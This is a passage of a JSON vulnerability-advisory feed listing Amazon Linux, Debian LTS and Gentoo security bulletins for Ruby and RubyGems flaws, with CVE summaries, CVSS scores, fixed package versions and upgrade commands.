rubygem20-psych-2.0.0-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby20-libs-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby20-devel-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby20-2.0.0.645-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem20-bigdecimal-1.2.0-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem20-io-console-0.4.2-1.27.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-3900](<https://access.redhat.com/security/cve/CVE-2015-3900>), [CVE-2015-4020](<https://access.redhat.com/security/cve/CVE-2015-4020>)\n\nMitre: [CVE-2015-3900](<https://vulners.com/cve/CVE-2015-3900>), [CVE-2015-4020](<https://vulners.com/cve/CVE-2015-4020>)\n", "cvss3": {}, "published": "2015-06-16T10:30:00", "type": "amazon", "title": "Medium: ruby20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-06-18T20:44:00", "id": "ALAS-2015-547", "href": "https://alas.aws.amazon.com/ALAS-2015-547.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-21T19:11:39", "description": "**Issue Overview:**\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specificly a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478), CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\n\n \n**Affected Packages:** \n\n\nruby22\n\n \n**Issue Correction:** \nRun _yum update ruby22_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 rubygem22-io-console-0.4.3-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-devel-2.2.2-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-libs-2.2.2-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-debuginfo-2.2.2-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem22-bigdecimal-1.2.6-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem22-psych-2.0.8-1.6.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby22-2.2.2-1.6.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 ruby22-doc-2.2.2-1.6.amzn1.noarch \n \u00a0\u00a0\u00a0 ruby22-irb-2.2.2-1.6.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems22-devel-2.4.5-1.6.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems22-2.4.5-1.6.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 ruby22-2.2.2-1.6.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ruby22-devel-2.2.2-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby22-libs-2.2.2-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem22-io-console-0.4.3-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby22-debuginfo-2.2.2-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem22-psych-2.0.8-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 rubygem22-bigdecimal-1.2.6-1.6.amzn1.x86_64 \n \u00a0\u00a0\u00a0 ruby22-2.2.2-1.6.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-3900](<https://access.redhat.com/security/cve/CVE-2015-3900>), [CVE-2015-4020](<https://access.redhat.com/security/cve/CVE-2015-4020>)\n\nMitre: [CVE-2015-3900](<https://vulners.com/cve/CVE-2015-3900>), [CVE-2015-4020](<https://vulners.com/cve/CVE-2015-4020>)\n", "cvss3": {}, "published": "2015-06-16T10:30:00", "type": "amazon", "title": "Medium: ruby22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-06-18T20:44:00", "id": "ALAS-2015-549", "href": "https://alas.aws.amazon.com/ALAS-2015-549.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2021-10-22T12:53:44", "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u5\nCVE ID : CVE-2016-2337 CVE-2018-1000073 CVE-2018-1000074\nDebian Bug : 895778 851161\n\nSeveral vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\n Type confusion exists in _cancel_eval Ruby's TclTkIp class\n method. Attacker passing different type of object than String as\n "retval" argument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\n RubyGems contains a Directory Traversal vulnerability in\n install_location function of package.rb that can result in path\n traversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\n RubyGems contains a Deserialization of Untrusted Data\n vulnerability in owner command that can result in code\n execution. This attack appear to be exploitable via victim must\n run the `gem owner` command on a gem with a specially crafted YAML\n file.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-27T20:25:50", "type": "debian", "title": "[SECURITY] [DLA 1480-1] ruby2.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2018-08-27T20:25:50", "id": "DEBIAN:DLA-1480-1:C4833", "href": "https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T13:44:51", "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u4\nCVE ID : CVE-2015-9096 CVE-2016-2339 CVE-2016-7798 CVE-2017-0898\n CVE-2017-0899 CVE-2017-0900 CVE-2017-0901 CVE-2017-0902\n CVE-2017-0903 CVE-2017-10784 CVE-2017-14033 CVE-2017-14064\n CVE-2017-17405 CVE-2017-17742 CVE-2017-17790 CVE-2018-6914\n CVE-2018-8777 CVE-2018-8778 CVE-2018-8779 CVE-2018-8780\n CVE-2018-1000075 CVE-2018-1000076 CVE-2018-1000077\n CVE-2018-1000078 CVE-2018-1000079\nDebian Bug : 851161\n\nMultiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\n SMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\n or MAIL FROM command.\n\nCVE-2016-2339\n\n Exploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\n Incorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\n ANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\n DoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\n gem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\n RubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\n Max Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n\nCVE-2017-10784\n\n Yusuke Endoh discovered an escape sequence injection vulnerability in\n the Basic authentication of WEBrick. An attacker can take advantage of\n this flaw to inject malicious escape sequences to the WEBrick log and\n potentially execute control characters on the victim's terminal\n emulator when reading logs.\n\nCVE-2017-14033\n\n asac reported a buffer underrun vulnerability in the OpenSSL\n extension. A remote attacker could take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\n Heap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\n A command injection vulnerability in Net::FTP might allow a\n malicious FTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\n Aaron Patterson reported that WEBrick bundled with Ruby was vulnerable\n to an HTTP response splitting vulnerability. It was possible for an\n attacker to inject fake HTTP responses if a script accepted an\n external input and output it without modifications.\n\nCVE-2017-17790\n\n A command injection vulnerability in lib/resolv.rb's lazy_initialze\n might allow a command injection attack. However untrusted input to\n this function is rather unlikely.\n\nCVE-2018-6914\n\n ooooooo_q discovered a directory traversal vulnerability in the\n Dir.mktmpdir method in the tmpdir library. It made it possible for\n attackers to create arbitrary directories or files via a .. (dot dot)\n in the prefix argument.\n\nCVE-2018-8777\n\n Eric Wong reported an out-of-memory DoS vulnerability related to a\n large request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\n aerodudrizzt found a buffer under-read vulnerability in the Ruby\n String#unpack method. If a big number was passed with the specifier @,\n the number was treated as a negative value, and an out-of-buffer read\n occurred. Attackers could read data on heaps if an script accepts an\n external input as the argument of String#unpack.\n\nCVE-2018-8779\n\n ooooooo_q reported that the UNIXServer.open and UNIXSocket.open\n methods of the socket library bundled with Ruby did not check for NUL\n bytes in the path argument. The lack of check made the methods\n vulnerable to unintentional socket creation and unintentional socket\n access.\n\nCVE-2018-8780\n\n ooooooo_q discovered an unintentional directory traversal in\n some methods in Dir, by the lack of checking for NUL bytes in their\n parameter.\n\nCVE-2018-1000075\n\n A negative size vulnerability in ruby gem package tar header that could\n cause an infinite loop.\n\nCVE-2018-1000076\n\n RubyGems package improperly verifies cryptographic signatures. A mis-signed\n gem could be installed if the tarball contains multiple gem signatures.\n\nCVE-2018-1000077\n\n An improper input validation vulnerability in RubyGems specification\n homepage attribute could allow malicious gem to set an invalid homepage\n URL.\n\nCVE-2018-1000078\n\n Cross Site Scripting (XSS) vulnerability in gem server display of homepage\n attribute.\n\nCVE-2018-1000079\n\n Path Traversal vulnerability during gem installation.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-14T06:28:37", "type": "debian", "title": "[SECURITY] [DLA 1421-1] ruby2.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780"], "modified": "2018-07-14T06:28:37", "id": "DEBIAN:DLA-1421-1:5BC60", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-21T06:06:40", "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\u201cWEBRick\u201d) and a class for XML parsing (\u201cREXML\u201d). \n\n### Description\n\nMultiple vulnerabilities have been discovered in Ruby. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Ruby users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-2.2.8\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-18T00:00:00", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337", "CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "modified": "2017-10-18T00:00:00", "id": "GLSA-201710-18", "href": "https://security.gentoo.org/glsa/201710-18", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}

EulerOS 2.0 SP2 : ruby (EulerOS-SA-2017-1051)

Description

Related